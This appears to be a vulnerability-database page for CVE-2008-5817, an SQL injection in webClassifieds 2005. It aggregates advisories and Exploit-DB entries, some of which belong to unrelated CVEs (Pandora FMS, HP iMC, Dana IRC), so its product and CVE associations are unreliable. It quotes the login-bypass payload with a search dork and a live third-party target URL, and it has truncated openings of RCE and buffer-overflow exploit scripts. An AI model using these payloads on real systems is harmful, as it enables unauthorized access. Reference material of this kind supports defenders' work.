CVE-2008-5817
Published 2009-01-02
Priority: P3 · 40 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.13% (62.4th percentile)
Multiple SQL injection vulnerabilities in index.php in Web Scribble Solutions webClassifieds 2005 allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) password fields in a sign_in action.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica | pandora_fms | >= 700 < 776 | 776 |
| pandora_fms | pandora_fms | 700 – <776 | — |
| web_scribble_solutions | webclassifieds | — | — |
GHSA
GHSA-q8mf-j7cw-h829: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pandora FMS on all allows CVE-2008-5817
ghsa_unreviewed·2024-03-19·CVSS 6.8
CVE-2023-44090 [MEDIUM] CWE-89 GHSA-q8mf-j7cw-h829: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pandora FMS on all allows CVE-2008-5817
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pandora FMS on all allows CVE-2008-5817. This vulnerability allowed SQL changes to be made to several files in the Grafana module. This issue affects Pandora FMS: from 700 through <776.
GHSA
GHSA-x6r6-328j-gcjv: Multiple SQL injection vulnerabilities in index
ghsa_unreviewed·2022-05-17
CVE-2008-5817 [MEDIUM] CWE-89 GHSA-x6r6-328j-gcjv: Multiple SQL injection vulnerabilities in index
Multiple SQL injection vulnerabilities in index.php in Web Scribble Solutions webClassifieds 2005 allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) password fields in a sign_in action.
No detection rules found.
Exploit-DB
HP iMC Plat 7.2 - Remote Code Execution
exploitdb·2017-11-28·CVSS 9.8
CVE-2017-5817 [CRITICAL] HP iMC Plat 7.2 - Remote Code Execution
---
#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE
# Date: 11-28-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5817
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-341/
# note that this PoC will create a file 'C:\poc.txt'
import socket, sys
ip = '192.168.1.74'
port = 2810
command = "echo PoC 12345 > C:\\poc.txt" # command to run
sock = socket.socket(socket.AF_INET, s
Exploit-DB
webClassifieds 2005 - Authentication Bypass
exploitdb·2008-12-29
CVE-2008-5817 webClassifieds 2005 - Authentication Bypass
---
** webClassifieds™© 2005 Admin Login Bypass vulnerability
** Product: webClassifieds™© 2005
** Home : http://www.webscribble.com/
** Vulnerability : Admin Bypass
** Risk : low
** Dork : "powered by webClassifieds"
** Discovered by: AnGeL25dZ
** From : Constantine - Algeria
** Contact : [email protected]
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeam http://www.hackteach.org/
** cold zero, Ra3ch, His0k4
** Exploit:
** http://[PATH]//classifieds/index.php?page=sign_in
**
** user : admin / user : ' or '1=1
** password : ' or '1=1 / password: ' or '1=1
**
** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
# milw0rm.com [2008-12-29]
Exploit-DB
Dana IRC 1.4a - Remote Buffer Overflow
exploitdb·2008-08-25
CVE-2008-2922 Dana IRC 1.4a - Remote Buffer Overflow
---
#!/usr/bin/perl
# k`sOSe - 08/24/2008
# This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.
# I was looking for a vuln to write an exploit for when I found this PoC:
#
# http://www.milw0rm.com/exploits/5817
#
# The author wrote:
# "The reason why there isn't any shellcode here is because the client is
# converting the junk/buffer data to unicode so it's corrupting the shellcode,
# I've tried sending unicode buffer but the same problem occurs.
# if anyone else can get further please let me know. but i doubt you can"
#
# It is for this reason, a small suggestion of impossibility (copyright Phantasmal Phantasmagoria)
# that I decided to write this. Actually it was pretty funny :)
#
# The first problem is how to redirect the
No writeups or analysis indexed.
http://secunia.com/advisories/33337
http://securityreason.com/securityalert/4860
http://www.securityfocus.com/bid/33028
https://exchange.xforce.ibmcloud.com/vulnerabilities/47629
https://www.exploit-db.com/exploits/7602
Published: 2009-01-02